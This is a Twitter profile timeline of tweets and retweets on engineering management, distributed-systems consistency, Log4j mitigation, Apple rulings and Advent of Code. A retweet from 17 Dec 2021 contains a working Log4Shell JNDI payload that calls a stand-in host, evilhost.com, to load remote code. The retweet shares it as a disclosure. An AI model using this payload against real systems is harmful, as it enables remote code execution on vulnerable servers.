Joined July 2009
- Tweets 354
- Following 363
- Followers 511
- Likes 383
16 Photos and videos
22 Mar 2022
Oooh, I like this list of KPIs for a (part of a) Platform org: backstage.io/docs/overview/a…
Alex Reece retweeted
8 Mar 2022
Thrilled to share my new blog post: Put an io_uring on it: Exploiting the Linux kernel. Follow me while I learn a new kernel subsystem its attack surface, find an 0day, build an exploit, come up with some new tricks. I go deep and demystify the process
graplsecurity.com/post/iou-r…
41
599
2,232
Alex Reece retweeted
8 Mar 2022
Even as remote work has become normal, too many of us persist with a practice that's a by-product of a hasty transition to remote: Back-to-back meetings without a break, sometimes for hours on end. But we can't just make a new RULE--we need a new NORM. edbatista.com/2022/03/take-f…
1
2
11
19 Jan 2022
"What then is the social responsibility of management for these social problems that become chronic complaints or degenerative diseases? They are management’s problems.
...
The health of the community is a prerequisite for successful and growing business."
- Peter Drucker, 1974
10 Jan 2022
Imagine you are writing a system that validates drivers licenses. In the /upload endpoint, you store the image somewhere and enqueue a background request to do the actual validation. When you write the validation logic, you either need a strongly consistent database OR 2/
1
10 Jan 2022
you need to handle the case where the image does not yet exist in the storage system because you got a stale read. 3/3
Alex Reece retweeted
17 Dec 2021
FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n
15
367
964
14 Dec 2021
My #log4j hot take - mitigation is much harder because of the modern trend of vendoring packaging dependencies (in a static binary or in a container).
All the #golang / #Kubernetes / etc shops should take this as a warning to make sure they could do an emergency upgrade.
1
1
14 Dec 2021
I know a service at a former company that hadn't been recompiled/rebuilt in years that probably had to do an emergency upgrade of a bunch of dependencies this weekend. 😢
Alex Reece retweeted
7 Dec 2021
Emotions MATTER--but a simplistic interpretation of this idea is "My feelings are justified, because they are my feelings. My feelings at this moment take precedence over all other considerations. I have the right to express my feelings any way I see fit." edbatista.com/2021/02/the-ty…
2
10
Alex Reece retweeted
8 Dec 2021
Issuing a correction / addition.
8
70
442
Alex Reece retweeted
8 Dec 2021
"Having one’s bias confirmed endlessly by a curated cascade of information reflecting back to you your preferences and opinions, second after second, understandably breeds an illusion of certainty. But certainty is nothing like wisdom." ~@ayadakhtar theatlantic.com/magazine/arc…
3
11
2 Dec 2021
#AdventOfCode2021 in awk feels like cheating, somehow.
awk 'BEGIN {depth=0; pos=0; aim=0} /forward/ {pos = $2; depth = aim * $2} /down/ {aim = $2} /up/ {aim -= $2} END { print depth * pos }'
5
24 Nov 2021
When I signed out of my @Apple ID on my Mac, it left me logged in to iMessage. 😳 This feels … dangerous.
1
6 Nov 2021
I’m bummed that @duolingo accepts “y’all” but not “yinz” for 你们 (plural you). Where’s your Pittsburgh pride? 🤣
2
22 Sep 2021
How do you think about talking about personnel issues in Slack?
Pro: they're a core part of a managers job (feedback, coaching, etc)
Con: they could be pretty disastrous if accidentally typed into the wrong text box
@mahorstman @Lethain @skamille @shreyas @staysaasy @edbatista
33%
Never in writing
0%
Only to HR
33%
Only to my manager
33%
What? Why not?
6 votes • Final results
Alex Reece retweeted
13 Sep 2021
Stop and UPDATE your iPhones to iOS 14.8 NOW!!! We @citizenlab recovered NSO Group's FORCEDENTRY zero-click exploit (CVE-2021-30860) from the phone of a Saudi activist, and shared w/ Apple, who released iOS 14.8 today with a fix. citizenlab.ca/2021/09/forced…
22
791
1,249
12 Sep 2021
The Apple v Epic ruling was fascinating to read: s3.documentcloud.org/documen…
Epic breached contract and owes >$3million.
Apple was NOT a monopoly for mobile gaming and not "coercive", but restricting in-app-payments is "anticompetitive" and Apple has to change policy
1
1
12 Sep 2021
🌶quote: "Apple set its 30% commission rate almost by accident when it first launched the App Store without considering operational costs, benefit to users, or value to developers, that is, both sides of the platform"
1
1